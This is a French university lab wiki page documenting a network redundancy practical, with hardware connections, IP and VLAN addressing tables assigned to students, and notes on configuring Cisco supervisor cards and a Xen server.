| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Description des connexions ==&lt;br /&gt;
Pour ce TP nous avons à notre disposition :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Désignation !! Référence !! Autre !! Connexion&lt;br /&gt;
|-&lt;br /&gt;
|Routeur&lt;br /&gt;
|6509&lt;br /&gt;
|Equipé de deux Hyperviseurs SUP720 avec x02 interfaces Giga et x02 TenGiga&lt;br /&gt;
|Connecté au réseau de Polytech pour accéder à internet via RENATER&lt;br /&gt;
|-&lt;br /&gt;
|Commutateur Cisco&lt;br /&gt;
|3560 E&lt;br /&gt;
|Equipement utilisé comme simple commutateur même s'il peut faire office de routeur&lt;br /&gt;
|Connecté au réseau de Polytech via la prise SR52-3/K16 &lt;br /&gt;
|-&lt;br /&gt;
|Commutateur Cisco&lt;br /&gt;
|ISR 4331&lt;br /&gt;
|Utilisé comme portail dérobé en cas de défaillance du 3560E&lt;br /&gt;
|Connecté au SDSL connecter via la prise SR52-3/L04,&lt;br /&gt;
|-&lt;br /&gt;
|Serveur de virtualisation&lt;br /&gt;
|R540&lt;br /&gt;
|Abrite les machines virtuelles&lt;br /&gt;
|Relié au 6509 par liaison fibre LC/LC et au 3560-E par câble Ethernet&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
NB: Nous avions eu à utiliser des modules SFP Giga et TenGiga Cisco de type LC ou SC.&lt;br /&gt;
Pour répondre à l’objectif du TP : la redondance matérielle, nous avions entamé le raccordement des équipements. Cependant, cela a entraîné une utilisation abusive des ressources que nous disposions : 6 liaisons fibres pour nos connexions alors que 3 nous étaient allouées, une partie est réservée aux IMA5SC.&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous nous sommes occupé de l'aspect Hardware du projet. Le but étant de connecter les différents éléments mis à disposition (Routeur 6509, Serveur de virtualisation R540 et commutateur 3560-E &amp;amp; ISR 4331) entre eux. Pour cela, nous nous sommes servis de la fibre mise à dispostion. En effet, le routeur 6509, composé des deux cartes de supervision doit être connectée au R540, au 3560-E ainsi qu'à l'ISR 4331 via une liaison fibre. Initialement, nous comptions connecter chaque carte de supervision aux autres éléments grâce à la fibre mis à disposition. Cela aurait donné le schéma ci-dessous : &lt;br /&gt;
&lt;br /&gt;
=== Architecture matérielle Optimale ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
=== Architecture matérielle Réelle ===&lt;br /&gt;
&lt;br /&gt;
Ainsi, grâce à cette configuration, il y aurait eu de la redondance entre les cartes de supervision et les autres éléments. De ce fait, si une des cartes de supervision était défectueuse, la seconde pourrait toujours communiquer avec le reste du système. Cependant, afin de se partager le matériel avec la seconde classe, nous ne pouvions utiliser que la moitié de la fibre mise à disposition. De ce fait, nous avons abouti à la configuration suivante : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
=== Architecture Réseau ===&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Architecture-Reseau-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan1 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom VM&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.161&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.162&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.163&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.164&lt;br /&gt;
|Rafale&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.165&lt;br /&gt;
|Concorde&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.166&lt;br /&gt;
|Blackbird&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.167&lt;br /&gt;
|Falcon&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|Mirage&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.169&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.170&lt;br /&gt;
|NightHawk&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.171&lt;br /&gt;
|hawker&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.172&lt;br /&gt;
|Boeing&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.173/28&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.240&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan130 ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|192.168.222.2&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|192.168.222.1&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.248&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table des vlan ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom !! Vlan &lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|Vlan3&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|Vlan4&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|Vlan5&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|Vlan6&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|Vlan8&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|Vlan9&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|Vlan10&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|Vlan11&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Administration&lt;br /&gt;
|Vlan1&lt;br /&gt;
|10.60.0.0/24&lt;br /&gt;
|&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|Vlan2&lt;br /&gt;
|193.48.57.160/28&lt;br /&gt;
|2001:660:4401:60a2::0/64&lt;br /&gt;
|193.48.57.161&lt;br /&gt;
|193.48.57.162&lt;br /&gt;
|193.48.57.163&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|Vlan7&lt;br /&gt;
|193.48.57.168/24&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|Vlan10&lt;br /&gt;
|10.60.7.0/24&lt;br /&gt;
|2001:660:4401:60aa::0/64&lt;br /&gt;
|10.60.7.1&lt;br /&gt;
|10.60.7.2&lt;br /&gt;
|10.60.7.3&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|Vlan11&lt;br /&gt;
|X&lt;br /&gt;
|2001:660:4401:60a2::4/64&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|mirage&lt;br /&gt;
|193.48.57.168/28&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problématique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existence d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la première carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxième carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérification de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;br /&gt;
&lt;br /&gt;
== Configuration machine Xen sur Capbreton ==&lt;br /&gt;
&lt;br /&gt;
- Connexion de l'écran, clavier, souris sur le serveur &lt;br /&gt;
- Commande &amp;quot;lbslk&amp;quot; permettant de voir les partitions sur la machine&lt;br /&gt;
    Il y a 2 disques de 500go qui forme un volume répartie de la façon suivante : 900Go pour Xen et 100Go pour le système.&lt;br /&gt;
    Il y a 1 disque SDA avec 800go de libre.&lt;br /&gt;
    Deux disques plus lent sont utilisé pour LVM.&lt;br /&gt;
- On souhaite déplacer les disques présent dans l'ancien serveur vers le serveur Capbreton cependant il faut s'assurer que les berceaux sont les même.&lt;br /&gt;
    Dans notre cas les berceaux ne sont pas les mêmes nous n'avons pas pu les insérer&lt;br /&gt;
&lt;br /&gt;
Concernant le brigde, nous avons vu dans /etc/network/interfaces &amp;quot;brigde_ports eth1 eth7&amp;quot;. Nous devons connecter eth1 et eth7. Pour connaître où sont les interfaces sur le serveur nous avons utilisé la commande:&lt;br /&gt;
    ethtool -p eth7&lt;br /&gt;
    ethtool -p eth1&lt;br /&gt;
&lt;br /&gt;
On a pu constater que eth7 correspond à la connexion en fibre optique et eth1 est la connexion cuivre&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	</feed>